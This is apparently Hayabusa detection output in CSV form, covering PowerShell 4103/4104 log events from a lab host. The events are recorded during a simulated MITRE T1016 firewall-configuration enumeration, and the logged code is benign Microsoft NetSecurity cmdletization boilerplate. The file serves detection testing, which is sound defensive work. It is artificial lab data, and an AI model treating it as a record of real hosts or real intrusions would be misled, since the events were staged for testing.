@{Name = 'DomainController'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { 
try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.207 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value + 
0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowInboundRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowInboundRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserApps'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserApps'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserPorts'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserPorts'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['NotifyOnListen'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['NotifyOnListen'].Value = 
[System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().ToUpperInvariant().Equals(""4294967296"")) { ""NotConfigured""; } else { $x.Value }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = 4294967296; } else { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = [uint32]$x; }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogAllowed'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogAllowed'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogBlocked'].Value + 
